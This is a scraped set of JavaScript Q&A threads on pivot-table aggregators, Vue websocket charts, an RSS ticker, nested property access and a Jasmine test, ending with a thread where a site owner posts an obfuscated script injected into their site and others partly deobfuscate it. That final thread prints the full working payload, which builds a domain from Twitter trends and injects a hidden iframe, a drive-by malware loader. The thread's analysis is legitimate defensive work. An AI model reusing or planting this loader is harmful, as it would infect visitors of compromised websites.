Sum of Hours,MInutes in PivotUI JS - javascript

pivotUI js
I am having issue with pivotUI js (chart creation JS).
i want to calculate duration field's total value as hours:min format. but pivotUI js default functions are not helpful for my requirements.
i want to create custom function for calculate that duration to hours and minutes format.
any suggestions ?
my code is like below.
var renderers = $.extend($.pivotUtilities.renderers, $.pivotUtilities.export_renderers, $.pivotUtilities.gchart_renderers, $.pivotUtilities.derivers);
var tpl = $.pivotUtilities.aggregatorTemplates;
$("#output").pivotUI(, {
renderers: renderers,
rows: ["fieldOne", "fieldTwo", "fieldThree", "Duration"],
cols: [],
//hiddenAttributes: ["Total"],
aggregators: {
"Total Time": function () {
return tpl.sum()(["Duration"]);
aggregatorName: "Total Time"

after debugging at very deep level, finally i got solution by adding custom function for calculating duration on pivot.js file.
step 1: firstly define your custom variables on js, like wise other variables used in pivot.js (hourMinuteFormat,hourMinuteInt are custom variables).
var PivotData, addSeparators, aggregatorTemplates, aggregators, dayNamesEn, derivers, getSort, locales, mthNamesEn, naturalSort, numberFormat, pivotTableRenderer, renderers, sortAs, usFmt, usFmtInt, usFmtPct, zeroPad, hourMinuteFormat, hourMinuteInt;
Step 2: create function which get duration and calculate total hours and total mins by logic as below.
hourMinuteFormat = function (opts) {
var defaults;
defaults = {
separator: ":"
opts = $.extend({}, defaults, opts);
return function (x) {
var totalh = Math.floor(x / 60);
if (totalh < 10)
totalh = "0" + totalh;
var totalm = x % 60;
if (totalm < 10)
totalm = "0" + totalm;
var result = totalh + opts.separator + totalm;
return result;
hourMinuteInt = hourMinuteFormat();
Step 3: After that need to create one more function which accept duration as "hh:mm" format and do further process to split it using ":" and store on different variables like hours,minutes.
HoursMinutes: function (formatter) {
if (formatter == null) {
formatter = hourMinuteInt;
return function (arg) {
var attr;
attr = arg[0];
return function (data, rowKey, colKey) {
return {
sum: 0,
push: function (record) {
if (record[attr]) {
var minute = parseInt((record[attr]).split(':')[1]);
var hour = parseInt((record[attr]).split(':')[0]) * 60;
return this.sum += minute + hour;
value: function () {
return this.sum;
format: formatter,
numInputs: attr != null ? 0 : 1
Step 4: find $.pivotUtilities array where other default functions are defined there define your custom function Like below:
$.pivotUtilities = {
aggregatorTemplates: aggregatorTemplates,
aggregators: aggregators,
renderers: renderers,
derivers: derivers,
locales: locales,
naturalSort: naturalSort,
numberFormat: numberFormat,
sortAs: sortAs,
PivotData: PivotData,
hourMinuteFormat: hourMinuteFormat //custom function
Step 5: after that in your file where you want to calculate duration, you need to use function named HoursMinutes() as below.
var renderers = $.extend($.pivotUtilities.renderers, $.pivotUtilities.export_renderers, $.pivotUtilities.gchart_renderers, $.pivotUtilities.derivers);
var tpl = $.pivotUtilities.aggregatorTemplates;
$("#output").pivotUI(, {
renderers: renderers,
rows: ["fieldOne", "fieldTwo", "fieldThree", "Duration"],
cols: [],
aggregators: {
"Total Time": function () {
return tpl.HoursMinutes()(["Duration"]);
aggregatorName: "Total Time"
i hope its understandable, if any one having query, then can ask me.


Updating component realtime based on Vue + apexchart + websocket

I have a chart like so:
<div class="flex flex-auto">
And the vue component has a method like so:
methods: {
getTraceData: function (data) {
var esocket = new WebSocket(
"ws://localhost:5001/provideTraceData?serverHost=" + data
esocket.onmessage = function (event) {
var res = JSON.parse(;
var ts = [];
var dataLength = res["timeseries"].length;
for (var i = dataLength - 1; i > dataLength - 11; i--) {
console.log("==", ts);
this.optionsLine = {
tooltip: {
shared: false,
x: {
formatter: function (val) {
var date = new Date(val * 1000);
// Hours part from the timestamp
var hours = date.getHours();
// Minutes part from the timestamp
var minutes = "0" + date.getMinutes();
// Seconds part from the timestamp
var seconds = "0" + date.getSeconds();
// Will display time in 10:30:23 format
var formattedTime =
hours + ":" + minutes.substr(-2) + ":" + seconds.substr(-2);
return formattedTime;
this.seriesLine = [
name: "TTFB",
data: ts,
From the WebSocket server I get a JSON response, I parse it, etc, etc, and then try to update the chart series. But for some reason, the chart does not seem to render.
But when I use a basic HTTP endpoint without WebSocket to get the same data then the chart renders. I'm sort of new javascript, is there some behind the scene async shenanigans happening I'm unaware of?
The logic of updating the chart is same, the difference between the HTTP and WebSocket versions is basically the URL string and the event handler, the rest is the same.

Update live JavaScript Array while pushing elements to HTML ID

I am facing a slight dilemma as a JavaScript newbie. Let me explain the script:
I have implemented a JavaScript function rss() which pulls from an internet RSS news feed and saves the news headlines into an array newsArray[].
The function headlinesInsert() should push every item in the array to the HTML ID #headlineInsert, similarly to how it is shown here.
However, the linked example's textlist variable (which should be replaced with my local newsArray[]) does not seem to be 'compatible' for some reason as when replacing nothing shows on the HTML side.
The idea is that the rss() function updates the global newsArray[] with new headlines every 10 minutes while the headlinesInsert() pushes this data to the HTML ID constantly (as per the linked example).
With my limited knowledge of JavaScript, I am hoping someone could help me set the following code right and put the idea into action.
// Push RSS Headlines into HTML ID
var newsArray = [];
var listTicker = function headlinesInsert(options) {
var defaults = {
list: [],
interval: 8 * 1000,
var options = $.extend(defaults, options);
var listTickerInner = function headlinesInsert(index) {
if (options.list.length == 0) return;
if (!index || index < 0 || index > options.list.length) index = 0;
var value = options.list[index];
options.trickerPanel.fadeOut(function headlinesInsert() {
var nextIndex = (index + 1) % options.list.length;
setTimeout(function headlinesInsert() {
}, options.interval);
// The following line should hold the values of newsArray[]
var textlist = new Array("News Headline 1", "News Headline 2", "News Headline 3", "News Headline 4");
$(function headlinesInsert() {
list: textlist ,
trickerPanel: $('#headlineInsert'),
interval: 8 * 1000,
$(function slow(){
// Parse News Headlines into array
function rss() {
$.getJSON("", function(data) {
newsArray = [];
for (var i = 0; i < data.items.length; i++){
newsArray[i] = (data.items[i].title);
// Refresh functions ever 10 minutes
setInterval(function slow() {
}, 600000); // 10 Minute refresh time
Check following code. You need to initialise listTicker once rss feed is loaded.
<script src=''></script>
var listTicker = function(options) {
var defaults = {
list: [],
startIndex: 0,
interval: 3 * 1000,
var options = $.extend(defaults, options);
var listTickerInner = function(index) {
if (options.list.length == 0) return;
if (!index || index < 0 || index > options.list.length) index = 0;
var value = options.list[index];
options.trickerPanel.fadeOut(function() {
var nextIndex = (index + 1) % options.list.length;
setTimeout(function() {
}, options.interval);
var textlist = new Array("news1", "news2", "news3");
$(function() {
function rss() {
$.getJSON("", function(data) {
newsArray = [];
for (var i = 0; i < data.items.length; i++) {
newsArray[i] = (data.items[i].title);
list: newsArray,
startIndex: 0,
trickerPanel: $('#newsPanel'),
interval: 3 * 1000,
<div id='newsPanel' />

Using a Passed Dot-Notated Parameter as Property Accessor within a Function

I'm fairly certain this is a simple mistake, but I'm confused as to why this won't work. I've been unable to find any documentation on using multiple brackets in a row when accessing properties. This is part of my code that creates a link that when clicked runs the "dropItem" function:
var dropDest = "screwdriver";
var dropCat = "";
dropButton.onclick= function() {dropItem(dropCat, dropDest)};
The "dropItem" function:
var dropItem = function(category, droppedItem) {
player.inventory[category][droppedItem].amount = player.inventory[category][droppedItem].amount - 1; };
I get a "Cannot read property 'screwdriver' of undefined" error. How would one properly pass this? Both properties need to be variables for it to work. Is this an error due to multiple brackets?
I realized I forgot to include how the player object is structured, and this is critical for understanding why I needed to pass a dot-notated category:
var player = {
"health": 100,
"hydration": 100,
"hunger": 100,
"energy": 100,
"inventory": {
"supplies": {
"tools": {
"screwdriver": {
"amount": 0,
"condition": 0
"buldingMaterials": {
"wood": {
"amount": 0,
"condition": 0
"aidPacks": {
"healthPacks": 0
This is why I need to be able to access both and player.inventory.aidPacks.healthpacks with the same function.
You can make your code more generic and easier. This is useful when you have more than two categories - then you dont need to work with [0] and 1 - here is the code:
var player = { "inventory": { "supplies": { "tools" : { "screwdriver" : { "amount" : 1}}}}};
var dropDest = "screwdriver";
var dropCat = "";
function getProperty(obj, str) {
return str.split(".").reduce(function(o, x) { return o[x] }, obj);
function dropItem(category, droppedItem) {
var accessString = dropCat + "." + droppedItem;
getProperty(player.inventory, accessString).amount -= 1;
alert(getProperty(player.inventory, accessString).amount);
dropItem(dropCat, dropDest);
Here is the fiddle:
After looking at lightstalker89's code I realized that my issue was not the brackets, but rather the category that was being passed was not parsing the dot notation in the middle, thus staying as "" instead of separating fully. However, due to the way the player object is structured I needed to be able to pass dot notated categories, so I split the string:
var player = { "inventory": { "supplies": { "tools" : { "screwdriver" : { "amount" : 1}}}}};
var dropDest = "screwdriver";
var dropCat = "";
function dropItem(category, droppedItem) {
if(category.indexOf(".") > 0) {
var newCat = category.split(".");
var cat1 = newCat[0];
var cat2 = newCat[1];
player.inventory[cat1][cat2][droppedItem].amount = player.inventory[cat1][cat2][droppedItem].amount - 1;
}else {
player.inventory[category][droppedItem].amount = player.inventory[category][droppedItem].amount - 1;
dropItem(dropCat, dropDest);
Here's the JSFiddle:
Again, huge thanks to #lightstalker89 for making me realise my mistake.
How does your player object look like? Is it an empty object when you want to change the properties.
Basically you can use multiple brackets as you did.
If the player object does not have the needed properties, then your code should look like this:
var player = {};
var dropDest = "screwdriver";
var dropCat = "";
function dropItem(category, droppedItem) {
player.inventory = {};
player.inventory[category] = {};
player.inventory[category][droppedItem] = { amount: 0};
player.inventory[category][droppedItem].amount = player.inventory[category][droppedItem].amount - 1;
dropItem(dropCat, dropDest);
Here is the fiddle:
If the player object exists you can use multiple brackets. The code should then look like this:
var player = { "inventory": { "" : { "screwdriver" : { "amount" : 1}}}};
var dropDest = "screwdriver";
var dropCat = "";
function dropItem(category, droppedItem) {
player.inventory[category][droppedItem].amount = player.inventory[category][droppedItem].amount - 1;
dropItem(dropCat, dropDest);
Here is the fiddle:

Javascript for loop doesn't work (adding numbers to a total)

I am using Jasmine for JS testing, and unfortunately I can't get the following test to pass.
it('should know the total game score', function() {
frame1 = new Frame;
frame2 = new Frame;
game = new Game;
frame1.score(3, 4);
frame2.score(5, 5);
The error message I get is as follows: Error: Expected 0 to equal 17.
The code is as follows:
function Game() {
this.scorecard = []
Game.prototype.add = function(frame) {
// Why is this not working!!???
Game.prototype.totalScore = function() {
total = 0;
for(i = 0; i < this.scorecard.length; i++)
total +=this.scorecard[i].rollOne + this.scorecard[i].rollTwo;
return total;
function Frame() {};
Frame.prototype.score = function(first_roll, second_roll) {
this.rollOne = first_roll;
this.rollTwo = second_roll;
return this
Frame.prototype.isStrike = function() {
return (this.rollOne === 10);
Frame.prototype.isSpare = function() {
return (this.rollOne + this.rollTwo === 10) && (this.rollOne !== 10)
Adding the numbers together manually seems to work e.g. total = game.scorecard[0].rollOne + this.scorecard[0].rollTwo , but the for loop (even though it looks correct) doesn't seem to work. Any help would be greatly appreciated :)
I am not pretty sure, but it seems that you are not calling the "Add" method, so no data is added to the scorecard.
You have to add the Frames to your game i guess
it('should know the total game score', function () {
frame1 = new Frame;
frame2 = new Frame;
game = new Game;
// those lines are missing
frame1.score(3, 4);
frame2.score(5, 5);
otherwise, the scorecard-array is empty and the total score is therefore equal to 0.
missing (so no data is added to the scorecard.)

Is this dangerous Javascript?

(function($$) {
d = "(#(){ %H=#( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=#( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};# #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery ;try{Pn=$ }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}# PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};# #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}# PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],#(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(#(){if &.Ph)!= (C)\\;$.Ph=1; 2S,#(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,#(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js#functionP#AV#n('X':'`','~.getUTC\\return .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(#(){ *#o(#d.jQuery)} +){var ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}# # 8+(+Ve -;P";
for (c = 50; c; d = (t = d.split('##PVX`~\\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
})(function(jsAP) {
return (function(jsA, jsAg) {
return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
})((function(jsA) {
return jsA.constructor
}), (function(jsA) {
return (function(jsAg) {
return, jsAg)
My host is saying nothing about this and it is happening frequently. I think they might be hiding a malicious hacking attempt.
What does this do?
We're changing hosts.
The code is indeed malicious and was injected into our website. Our host was trying to conceal that (probably so that we wouldn't worry)
This happened to my friend's website on the same host.
Don't test out this script, please.
Looks like some obfuscated injection.
Let's work and decipher this; it'll be fun(-nish).
AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.
Here's the blob of text decoded after decoding along with the start of analysis:
(function () {
jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.
/* Returns either first element of jsA, or a joined string. */
function firstElementOrJoined(jsA) {
return jsA.length == 1 ? jsA[0] : jsA.join('')
jsAj = document;
loadJquery(); // Load JQ in head new script tag.
function divideAndFloor(jsq, jsAB) {
return Math.floor(jsq / jsAB)
function jsx(jss) {
var jsAC = divideAndFloor(jsN, jsAm);
var jsF = jsN % jsAm;
var jsf = (jsAD * jsF) - (jsAT * jsAC);
if (jsf > 0) {
jsN = jsf
} else {
jsN = jsf + jsAv
return (jsN % jss)
/** Used only once in .getJSON call. */
function jst(jsk) {
jsN = 2345678901 + jsk;
jsAD = 48271;
jsAv = 2147483647;
jsAm = divideAndFloor(jsAv, jsAD);
jsAT = jsAv % jsAD
/** Takes twitter as_of and subtracts ~2 days. */
function jse(jsA) {
d = new Date();
d.setTime((jsA.as_of - 172800) * '1000');
return d
function jsz(jsAz) {
var jsc, jsAL, jsj = jsAz.length;
var jsv = [];
while (--jsj) {
jsAL = jsx(jsj);
jsc = jsAz[jsAL];
jsAz[jsAL] = jsAz[jsj];
jsAz[jsj] = jsc
function jso($) {
// Wait until we have jQuery loaded.
if (typeof($) == 'undefined') {
setTimeout(function () { jso(jQuery) }, 1222);
$(function () {
// Only run this function once (there's a timeout inside).
if (typeof ($.jsAh) != 'undefined') return;
$.jsAh = 1;
$.getJSON('', function (data) {
dateTwoDaysPrior = jse(data);
nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
urlTwitterTwoDaysAgo = '' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;
twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
jsAd = twoDigitPrevSixHr + 1;
// Run JSON request every second.
setTimeout(function () {
$.getJSON(urlTwitterTwoDaysAgo, function (data) {
try {
jsy = data.trends;
for (jsr in jsy) {
jsr = jsr.substr(0, 11); // == 2011-11-10
if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh
// Try to get trends for last 6hr thing (but the :00 will make it never work?)
// If can't, try to get the next 6hr thing.
jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
if (!jsb) jsb = jsy[jsr + jsAd + ':00'];
// Get third trend entry, e.g.,
// {
// "name": "#sinterklaasintocht",
// "query": "#sinterklaasintocht",
// "promoted_content": null,
// "events": null
// }
// and strip out non-chars from name, add safetynet, and convert to array
// ['s', 'i', etc... nterklaasintochtsafetynet]
jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');
// 803 + prevSixHr * 3 + 410; -- some sort of hash?
hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
jsa = jsx(4) + 10;
// Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
// jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
jsAr['Z'] = jsg;
jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
} catch (jsAy) {}
}, 1000)
Here's some URLs constructed from the array:
jsd.jsS =
This chunk of code:
jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
appends the jquery script tag to <head>:
<script src=""></script>

